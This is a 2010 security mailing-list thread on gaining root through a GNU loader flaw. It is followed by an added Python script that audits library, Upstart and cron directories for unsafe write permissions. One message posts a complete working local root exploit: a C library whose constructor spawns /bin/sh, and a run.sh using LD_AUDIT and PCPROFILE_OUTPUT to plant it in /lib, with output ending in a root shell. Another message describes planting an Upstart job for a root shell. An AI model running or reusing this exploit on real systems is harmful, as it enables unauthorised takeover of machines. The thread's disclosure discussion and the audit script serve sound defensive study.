PaulDotCom mailing list archives
Re: Privilege escalation with GNU ld dlopen
From: Xavier Garcia <xavi.garcia () gmail com>
Date: Tue, 9 Nov 2010 17:19:48 +0100
Hi,

One should be safe because users need admin rights to write there, but playing with setuid binaries is always dangerous.

This could be enforced by implementing a 'secure level' in the kernel, but then the maintenance of the system could be a nightmare. Imagine having to reboot a critical server just because the 'secure level' must be disabled in order to install patches :)

Regards,
Xavier Garcia

On Tue, Nov 09, 2010 at 09:57:37AM -0500, Nicholas B. wrote:

One would hope a system didn't allow just anyone to write to /lib/

On Tue, Nov 9, 2010 at 4:43 AM, Xavier Garcia <xavi.garcia () gmail com> wrote:

Hi guys,

I finally found an easier way to gain root privileges, without rebooting the computer. The vulnerability can be used to upload a custom library to the server and then execute a root shell.

The library is really simple (libevil.so):

----
#include <errno.h>
#include <unistd.h>

static void __attribute__ ((constructor)) install (void)
{
    execl("/bin/sh", "/bin/sh", (char *) 0);
}
----

user@host:~/$ cat ./run.sh
umask 0
gcc -c -fPIC evil.c -o evil.o
gcc -shared -Wl,-soname,libevil.so.1 -o libevil.so evil.o
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libevil.so" ping
cat ./libevil.so > /lib/libevil.so
LD_AUDIT="libevil.so" ping

user@host:~/$ sh run.sh
ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline] [-p pattern] [-s packetsize] [-t ttl] [-I interface] [-M pmtudisc-hint] [-m mark] [-S sndbuf] [-T tstamp-options] [-Q tos] [hop1 ...] destination
# whoami
root
#

I hope it is helpful.

Regards,
Xavier Garcia

On Fri, Nov 05, 2010 at 12:11:32PM +0100, Xavier Garcia wrote:

Hi guys,

I am trying to find some ways to gain root access by using the vulnerability described in the advisory http://marc.info/?l=full-disclosure&m=128776663124692&w=2 published by Tavis Ormandy.

The advisory states that Cron can be used to escalate privileges, but Cron does not accept files that are writable by the group or others, returning the error BAD FILE MODE.

I have been looking for alternative ways to gain root access, but there are not many places where it is possible. I have found that Upstart (http://en.wikipedia.org/wiki/Upstart) does not check the permissions and happily reads the configuration files every time it restarts.

This means that we can create a configuration file that will instruct Upstart to drop a root shell :) The down side is that we have to be patient and wait until the computer is rebooted, or use some social engineering.

You can find more details at http://www.shellguardians.com/2010/11/privilege-escalation-with-upstart-and.html

I hope this finding is interesting or useful for the list.

Regards,
Xavier Garcia

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail pauldotcom com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
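The thread turns on which files a privileged consumer will trust: cron refuses group- or other-writable files (BAD FILE MODE), Upstart reads its job files without any such check, and the posted run.sh creates /lib/libevil.so under umask 0, so the dropped library is world-writable. The permission audit below is an added example written for this page, not code from the thread or from any of the projects mentioned; it applies cron's rule plus an owner check to the directories a loader, Upstart or cron trusts, so a dropped or loosened file shows up before a reboot does the rest. The directory list, the reason strings and the sample tree are constructed for the example; the default owner of 0 (root) is an assumption to adjust for a given host.

```python
import os
import stat
import tempfile
from typing import Dict, List

# Directories whose contents a privileged consumer trusts: the dynamic loader
# (library search path), Upstart (/etc/init) and cron (/etc/cron.d).
# Constructed default for this example; adjust to the host being audited.
DEFAULT_TRUSTED_DIRS = ["/lib", "/lib64", "/usr/lib", "/etc/init", "/etc/cron.d"]


def insecure_modes(path: str, expected_uid: int = 0) -> List[str]:
    """Reasons why `path` is unsafe for a privileged consumer (empty = OK).

    Applies the rule cron enforces (group- or other-writable -> BAD FILE MODE)
    and additionally requires the expected owner, because a non-root owner can
    chmod the file back to writable whenever it likes.
    """
    st = os.lstat(path)
    reasons = []
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if st.st_uid != expected_uid:
        reasons.append("owned by uid %d, expected %d" % (st.st_uid, expected_uid))
    return reasons


def audit_trusted_dirs(dirs: List[str] = DEFAULT_TRUSTED_DIRS,
                       expected_uid: int = 0) -> Dict[str, List[str]]:
    """Walk each directory and map every insecure path to its reasons.

    Directories are checked as well: a writable /lib is as bad as a writable
    library inside it. Symlinks are skipped because their own mode bits are
    meaningless on Linux; their targets are checked wherever they live.
    """
    findings: Dict[str, List[str]] = {}
    for top in dirs:
        if not os.path.isdir(top):
            continue  # e.g. no Upstart on this host
        for dirpath, _dirnames, filenames in os.walk(top):
            for path in [dirpath] + [os.path.join(dirpath, f) for f in filenames]:
                if os.path.islink(path):
                    continue
                reasons = insecure_modes(path, expected_uid)
                if reasons:
                    findings[path] = reasons
    return findings


def audit_sample_tree() -> Dict[str, List[str]]:
    """Build a constructed sample layout and audit it as the current user.

    The tree imitates the situations in the thread: a sane library, one
    dropped under umask 0 (world-writable, as run.sh would leave it) and an
    Upstart-style job file that is group-writable. The files belong to
    whoever runs this, so expected_uid is os.getuid() rather than 0.
    Returns {logical name: reasons}; an empty list means the path passed.
    """
    root = tempfile.mkdtemp(prefix="audit-demo-")
    os.mkdir(os.path.join(root, "init"), 0o755)
    layout = {
        "ok": (os.path.join(root, "libok.so"), 0o644),
        "dropped": (os.path.join(root, "libevil.so"), 0o666),  # umask 0 result
        "job": (os.path.join(root, "init", "job.conf"), 0o664),
    }
    for path, mode in layout.values():
        open(path, "w").close()
        os.chmod(path, mode)
    findings = audit_trusted_dirs([root], expected_uid=os.getuid())
    result = {name: findings.get(path, []) for name, (path, _) in layout.items()}
    result["root"] = findings.get(root, [])
    return result


if __name__ == "__main__":
    # Stand-alone run: the real host directories first, then the sample tree.
    for path, reasons in sorted(audit_trusted_dirs().items()):
        print(path, ", ".join(reasons))
    for name, reasons in sorted(audit_sample_tree().items()):
        print(name, reasons or "ok")
```

Run as root with the default list to get real findings; the owner check means any finding on a host where the whole tree should be root-owned is worth a look, and a world-writable entry under a loader path is exactly the state the posted script produces.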
Current thread:
- Privilege escalation with GNU ld dlopen Xavier Garcia (Nov 05)
- Re: Privilege escalation with GNU ld dlopen Xavier Garcia (Nov 09)
- Re: Privilege escalation with GNU ld dlopen Nicholas B. (Nov 09)
- Re: Privilege escalation with GNU ld dlopen Xavier Garcia (Nov 09)
- Re: Privilege escalation with GNU ld dlopen Joshua Wright (Nov 10)
- Re: Privilege escalation with GNU ld dlopen Mike Patterson (Nov 10)
- Re: Privilege escalation with GNU ld dlopen Mike Patterson (Nov 10)
- Re: Privilege escalation with GNU ld dlopen Xavi Garcia (Nov 10)
- Re: Privilege escalation with GNU ld dlopen Nicholas B. (Nov 09)
- Re: Privilege escalation with GNU ld dlopen Xavier Garcia (Nov 09)